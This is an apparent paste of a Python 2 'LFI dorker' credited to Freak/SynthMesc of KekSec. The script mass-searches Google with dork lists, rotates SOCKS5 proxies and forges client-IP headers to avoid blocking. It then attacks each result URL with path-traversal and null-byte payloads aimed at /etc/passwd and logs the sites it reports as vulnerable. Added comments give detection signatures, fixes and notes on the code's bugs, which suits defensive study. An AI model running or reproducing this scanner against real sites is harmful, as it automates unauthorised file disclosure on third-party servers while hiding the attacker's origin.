KekSec

ULTIMATE LFI DORKER [2019]

Jun 25th, 2019
  1. #!/usr/bin/python
  2. #LFI google dork scanner
  3. #coded by Freak/SynthMesc
  4. #Version 1.0.0 first release
  5. import sys,re,random,string,time,threading,os,socket,socks,urllib2,urllib
  6. try:
         # Both positional arguments are file paths: dorklist is opened by the main loop at the end
         # of the script, proxylist by switchProxy(). The bare except below also covers the
         # IndexError raised when either argument is missing.
  7.     dorklist=sys.argv[1]
  8.     proxylist=sys.argv[2]
  9. except:
  10.     print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
  11.     exit(1)
  12. def switchProxy():
          # Replaces socket.socket for the whole process with socks.socksocket, configured for one
          # SOCKS5 proxy picked at random from the proxylist file. The file is re-read on every
          # call and each entry is split on ":" into host and port.
          # socket.backup holds the original socket.socket so each call starts from the real class.
          # Called from spyder() when a search request raises.
          # Detection note: once this has run, connections made through the socket module
          # presumably leave from the proxy's address, so source-IP blocking alone will not follow
          # this traffic; match on request content instead.
  13.     try:
  14.         socket.backup
  15.     except:
  16.         socket.backup = socket.socket
  17.     socket.socket = socket.backup
  18.     proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
  19.     proxyport = int(proxyhost[1])
  20.     proxyhost = proxyhost[0]
  21.     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
  22.     socket.socket = socks.socksocket
  23. def randomIP():
          # Returns a dotted-quad string built from four independent random integers in 0..255.
          # test() and spyder() use it as the value of client-address style request headers.
          # Detection note: no range is excluded, so the values include reserved and non-routable
          # addresses (0.x, 10.x, 127.x, 255.x, ...), which a genuine forwarding proxy would
          # rarely report.
  24.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
  25. def fixurl(url, args, testfile, isnull = False):
          # Substitutes testfile into url in place of a parameter value taken from args
          # (args is url.split("=") as built by test()).
          # When url contains "&", only the part of args[i] before the first "&" is replaced; with
          # isnull set, that part followed by "%00" is the text searched for.
          # The return statement is inside the loop body, so the function returns after handling
          # args[1]; if args has a single element the loop never runs and the result is None.
  26.     for i in range(1, len(args)):
  27.         if "&" in url:
  28.             if isnull:
  29.                 url=url.replace(args[i].split("&")[0]+"%00", testfile)
  30.             else:
  31.                 url=url.replace(args[i].split("&")[0], testfile)
  32.         else:
  33.             url=url.replace(args[i], testfile)
  34.         return url
  35. def test(url):
          # Probes one search-result URL for local file inclusion. The URL is rewritten through
          # fixurl() with testfile, which starts as "/etc/passwd" and gains a "../" style prefix
          # after every attempt (six attempts per "="-separated segment longer than two characters).
          # URLs that pass the response check are appended to LFI_Vulnerable.txt.
          # Log/WAF signatures for this traffic: query-string values containing "etc/passwd",
          # usually preceded by runs of "../". Applications avoid the underlying issue by never
          # building file paths from request parameters, or by resolving them against an allow-list.
  36.     try:
  37.         opener = urllib2.build_opener()
  38.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  39.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  40.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
  41.         opener.addheaders = [('VIA',randomIP())]
  42.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
              # NOTE(review): every assignment above rebinds opener.addheaders, so the only list
              # still set when a request is made is the X-FORWARDED-FOR one. For log matching,
              # expect that header with a random address rather than the Firefox User-agent string.
  43.         keywords=['nobody:'] # 'cannot be run in DOS'
  44.         testfile = "/etc/passwd"
  45.         args = url.split("=")
  46.         for i in range(1, len(args)):
  47.             for increment in range(0, 6):
  48.                 if len(args[i]) <= 2:
  49.                     continue
  50.                 if increment % 2 == 0:
  51.                     if args[i].endswith("%00"):
  52.                         url = fixurl(url, args, testfile, True)
  53.                     else:
  54.                         args[i] += "%00"
  55.                         url = fixurl(url, args, testfile, False)
  56.                         print "[+] Trying null byte on "+url
  57.                 else:
  58.                     print "[+] Trying on "+url
  59.                 try:
  60.                  resp=opener.open(url,timeout=5).read()
  61.                 except Exception, e:
                        # Any request failure ends the whole probe for this URL.
  62.                   print("[-] "+str(e))
  63.                   return
                      # pbody holds the pieces of the response between "<html" occurrences, without
                      # the first and last piece, so it is empty unless "<html" occurs at least twice.
                      # NOTE(review): the loop below records the URL as soon as pbody has one element;
                      # keyword only appears in the printed message. An entry in LFI_Vulnerable.txt
                      # therefore does not show that /etc/passwd content was returned - confirm
                      # against server-side logs and responses when triaging.
  64.                 pbody = resp.split("<html")[1:][:-1]
  65.                 for keyword in keywords:
  66.                     try:
  67.                         for x in pbody:
  68.                             print "[+] Found keyword '"+keyword+"' at "+url
  69.                             f=open("LFI_Vulnerable.txt","a")
  70.                             f.write(url+"\n")
  71.                             f.close()
  72.                             return
  73.                     except urllib2.HTTPError as e:
  74.                         print("[-] "+str(e))
  75.                         pass
                      # Deepen the traversal for the next attempt: "/etc/passwd" becomes
                      # "../etc/passwd" first, then one more "../" is prepended each time.
  76.                 if increment <= 0:
  77.                     testfile = ".." + testfile
  78.                 else:
  79.                     testfile = "../" + testfile
  80.     except urllib2.URLError as e:
  81.         print "[-] "+str(e)
  82.         pass
  83. def spyder(dork,page):
          # Fetches one search-results page (dork is a complete search URL), follows the link to
          # the next results page, and starts a test() thread for each result URL that is not on
          # one of Google's own hosts. page is the number used to recognise the next-page link
          # ("start=<page>0&sa=N").
  84.     opener = urllib2.build_opener()
  85.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  86.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  87.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
  88.     opener.addheaders = [('VIA',randomIP())]
  89.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  90.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  91.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
  92.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
  93.     opener.addheaders = [('Referer',dork)]
          # NOTE(review): each assignment above rebinds opener.addheaders, so only the Referer
          # list is still set when the search request is made.
  94.     try:
  95.         searchresults=opener.open(dork,timeout=5).read()
  96.     except Exception, e:
              # Any failure is treated as a block by the search engine: change proxy and start
              # the same search again in a nested call. searchresults stays unbound in this frame.
  97.         print "[-] "+str(e)
  98.         print "[-] Bot has been blocked from google!!! Switching proxy!"
  99.         switchProxy()
  100.         spyder(dork, page)
           # Referencing the bare name raises NameError when the first request failed; in that
           # case the request is retried up to twice before switching proxy and recursing again.
  101.     try:
  102.         searchresults
  103.     except NameError:
  104. #       print "[-] Variable undefined, re-searching"
  105.         try:
  106.             searchresults=opener.open(dork,timeout=5).read()
  107.         except:
  108.             try:
  109.                 searchresults=opener.open(dork,timeout=5).read()
  110.             except:
  111.                 print "[-] Bot has been blocked from google!!! Switching proxy!"
  112.                 switchProxy()
  113.                 spyder(dork, page)
  114.     else:
  115.         pass
  116. #       print "[+] Variable defined, continuing search"
  117.  
           # Walk every href value in the page (quoted with " or ').
  118.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
  119.         i=i.replace("amp;",'')
               # Next-page link: pause 5-34 seconds (randrange excludes 35), then crawl that
               # page recursively before continuing with the remaining links of this one.
  120.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
  121.             dorkurl="https://encrypted.google.com"+i
  122.             print("[+] Searching next page "+dorkurl)
  123.             time.sleep(random.randrange(5, 35))
  124.             spyder(dorkurl,page)
  125.             page+=1
  126.         i=urllib2.unquote(i).decode('utf8')
  127.         try:
                   # Keep the text between "?q=" and "&sa=", presumably the target of a
                   # redirect-style result link; links without "?q=" raise IndexError and are skipped.
  128.             i=i.split("?q=")[1]
  129.             i=i.split("&sa=")[0]
  130.             if i.startswith("http"):
  131.                     if "accounts.google.com" in i:
  132.                         continue
  133.                     elif "www.google.com" in i:
  134.                         continue
  135.                     elif "encrypted.google.com" in i:
  136.                         continue
  137.                     elif "webcache.googleusercontent.com" in i:
  138.                         continue
  139.                     elif "support.google.com" in i:
  140.                         continue
  141.                     elif i!=dork.decode('utf8'):
                               # One thread per remaining result URL; the threads are started
                               # without a limit and are never joined.
  142.                         threading.Thread(target=test, args=(i,)).start()
  143.         except:
  144.             continue
  145. f=open(dorklist,"r")
       # Main loop: one search per line of the dork list, run sequentially. Each dork is
       # URL-encoded into a search query and crawling starts with page number 1.
       # The test() threads started by spyder() are not waited for here.
  146. for dork in f.read().split("\n"):
  147.     print "[+] Searching for dork: '"+dork+"'"
  148.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
  149. f.close()